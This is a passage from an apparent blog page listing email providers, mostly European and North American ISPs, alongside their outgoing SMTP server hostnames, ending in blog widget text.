mail.quizil.netmail.quizil.net
mail.rusmtp.mail.ru
Mailsnaremail.mailsnare.net
Maktoob Mailmira0.maktoob.com
McLinkmail.mclink.it
Mediacommail.mchsi.com
Mistralsmtp.mistral.co.uk
Momaxsmtp.momax.it
ms15.hinet.netms15.hinet.net
msoft.itsmtp.weblinea.it
mtelmail.mtel.net
NamesTodaysmtp.namestoday.ws
NamesTodaysmtp.namestoday.ws
nerim.netastralblue@nerim.net
netcabosmtp.netcabo.pt
Netexplora Chilemail.netexplora.com
Netlinkmail.netlink.co.nz
netscapesmtp.isp.netscape.com
Netscapeonlinemailhost.netscapeonline.co.uk
netvigatormail.netvigator.com
Netvisão (Portugal)mail.netvisao.pt
Netvisão (Portugal)mail.netvisao.pt
NetZero.comsmtp.netzero.com
neuf telecomsmtp.neuf.fr
NGIsmtp.ngi.it
Nildramsmtp.nildram.co.uk
Noossmtp.noos.fr
novis (portugal)mail.novis.pt
ntl (uk)smtp.ntlworld.com
NTLWorldsmtp.ntlworld.com
OneTelmail.onetel.net.uk
onowanadoo.fr
oNosmtp.ono.com
Optonline (Cablevision's Optimum Online)mail.optonline.net
Orconmail.orcon.net.nz
outgoing.verizon.nettchrshelli
P.C.T.S.ns.pcts.sk
Paradise Netsmtp.paradise.net.nz
PCHomesmtp.pchome.com.tw
Pipexsmtp.dsl.pipex.com
Pipexsmtp.dial.pipex.com
pixiussmtp.citilink.com
Post Manmail.postman.net
Poste.itrelay.poste.it
postino.itsmtp.postino.it
Previdenciakiwi.previdencia.gov.br
prodigyxasa.com
Prodigy(TELMEX)(México)smtp.prodigy.net.mx
promo.itsmtp.promo.it
Purplenetsmtp.purplenet.co.uk
Quipoquipo.it
R (cable Galicia)smtp.mundo-r.com
Radio Deejay Mailsmtp.deejaymail.it
RCP (PERU)amauta.rcp.net.pe
Reteitalysmtp.reteitaly.com
Rogerssmtp.broadband.rogers.com
RunBoxsmtp.runbox.com
Sapo (Portugal)mx.sapo.pt
SBC Global (Yahoo Powered)smtp.snet.yahoo.com
SBC Global (Yahoo Powered)smtp.wans.yahoo.com
SBC Global (Yahoo Powered)smtp.swbell.yahoo.com
SBC Global (Yahoo Powered)smtp.ameritech.yahoo.com
SBC Global (Yahoo Powered)smtp.flash.yahoo.com
SBC Global (Yahoo Powered)smtp.nvbell.yahoo.com
SBC Global (Yahoo Powered)smtp.pacbell.yahoo.com
SBC Global (Yahoo Powered)smtp.prodigy.yahoo.com
SBC Global (Yahoo Powered)smtp.sbcglobal.yahoo.com
SBC Yahoo DSLsmtp.sbcglobal.yahoo.com
sbcyahoo.dslsmtp.sbcglobal.yahoo.com
Scarlet or Scarlet.besmtp.scarlet.be
Screaming.Netsmtp.tiscali.co.uk
SFR (French mobile telephone)smtp-auth.sfr.fr
Shylex Telecomunicacionessmtp.shylex.net
SiFree.itsmtp.simail.it
sify.commail.satyam.net.in
skynetrelay.skynet.be
Skynet.berelay.skynet.be
Slingshotsmtp.slingshot.co.nz
softhome.netmail.softhome.net
SouthNetsmtp.southnet.co.nz
Southwestern Bellmail.swbell.net
SprintPCSsmtp.sprintpcs.com
Spymacmail.spymac.com
StofaNet.dkmail1.stofanet.dk
sunrise (CH)smtp.sunrise.ch
Supanetsmtp.supanet.com
superevamail.supereva.it
SuperFree.itsmtp.superfree.it
sympaticosmtp1.sympatico.ca
Tag Comunicazioni64.94.0.31
TalkTalksmtp.TalkTalk.net
Tariffe.itsmtp.tariffenet.it
TDCbackup-mx.post.tele.dk
tele2.frsmtp.tele2.fr
tele2.itsmtp.tele2.it
Tele2Internetvirtual.everyday.com
telecommail.cs.interbusiness.it
Telecom (Alice)mail.tin.it
Telecom ADSL (Business)mail.191.it
Telecom ADSL (Business)smtp.191.it
telecom italia191.it
Telecom Smartmail.tuttopmi.it
Telecom Xtrasmtp.xtra.co.nz
Teleconomy Internetmail.191.it
TELEDISNET.BEmail.teledisnet.be
telefonicasmtp.telefonica.net
Telenet (belgium)uit.telenet.be
telenet(belgium)uit.telenet.be
telepacsmtp.telepac.pt
Telepac ADSL (Portugal)smtp.telepac.pt
telewestsmtp.blueyonder.co.uk
Telewestsmtp.blueyonder.co.uk
telkomsmpt.telkom.net
Telkomsa.netsmtp.telkomsa.net
Telussmtp.telus.net
Telus.netmail.telus.net
Telvia.itsmtp.telvia.it
Terrasmtp.terra.es
Terra - BRsmtp.sao.terra.com.br
Terra - BR - Recifesmtp.rec.terra.com.br
Terra - Españamailhost..terra.es
Terra - Españasmtp.mailhost.terra.es
Terra - Españasmtp.mailhost.terra.es
Tesconetmail.tesco.net
TIM.itmail.posta.tim.it
timenet ADSLsmtp2.xdslnet.it
TimeWarner(Unknown At This Time)
Tin.itout.virgilio.it
TIN.IT free (funziona con Alice)mail.clubnet.tin.it
Tiscalismtp.tiscali.it
Tiscalismtp.tiscali.co.uk
Tiscali.desmtp.tiscali.de
tiscali.essmtp.tiscali.es
Tiscali.nlsmtp.tiscali.nl
Tnetmail.tnet.it
t-onlinemailto.t-online.de
Totalisemail.totalise.co.uk
tresmtp.tre.it
Tugamailmail.tugamail.com
TuttoGratis.itsmtp.eutelia.it
Tvteltvtel.pt
UKGatewaysmtp.ukgateway.net
unitedemailsystemsunitedemailsystems.com
unitedemailsystemssmtp.unitedemailsystems.com
UOLsmtp.uol.com.br
UOL Sinectis Argentinarelay.uolsinectis.com.ar
US Cablesmtp.warpdriveonline.com
USA.netsmtp.postoffice.net
utenti interbusiness telecommail.cs.interbusiness.it
Utopia Systemssmtp.utopiasystems.net
utu.fismtp.utu.fi
V 21smtp.v21.co.uk
Verizon DSLoutgoing.verizon.net
videobankvideobank.it
virgilioout.virgilio.it
Virginsmtp.virgin.net
Vispamail.vispa.com
Vivacitypop.Vivacity.it
Vodafone.itsmtpmail.vodafone.it
Waitrosesmtpmail.waitrose.com
wanadoosmtp.wanadooadsl.net
wanadoo (France)smtp.wanadoo.fr
wanadoo Españasmtp.wanadoo.es
wanadoo.nlsmtp.wanadoo.nl
Web.desmtp.web.de
Webmail.issmtp.emailsrvr.com
Which Onlinemail.which.net
Windows Live Hotmailsmtp.live.com
wooow.itsmtp.wooow.it
World-Netmail.world-net.co.nz
Worldonlinesmtp.tiscali.co.uk
www.gmail.comsmtp.gmail.com
www.qos.net.ilmail.qos.net.il
www.tol.itsmtp-tol.it
www.tol.itsmtp.tol.it
X-Privatmail.x-privat.org
XS4ALLsmtp.xs4all.nl
xs4all.nlmail.xs4all.nl
Xtrasmtp.xtra.co.nz
Ya.comsmtp.ya.com
Ya.com ADSLsmtp2.adsl.ya.com
yahooyahoo.es
Yahoosmtp.mail.yahoo.com
yahoosmtp.mail.yahoo.com.cn
Yahoo (autentication needed)smtp.mail.yahoo.com
Yahoo Argentinasmtp.mail.yahoo.com.ar
yahoo.co.uksmtp.mail.yahoo.co.uk
yahoo.com.twsmtp.mail.yahoo.com.tw
yahoo.com.twstmp.mail.yahoo.com
Yahoo.desmtp.mail.yahoo.de
yahoo.essmtp.correo.yahoo.es
yahoo.itsmtp.mail.yahoo.it
ZeelandNetmail.zeelandnet.nl
zero.ad.jpzero.ad.jp
Zonnetsmtp.zonnet.nl

Label Cloud

Blogumulus by Roy Tanck and Amanda Fazani

Your Ad Here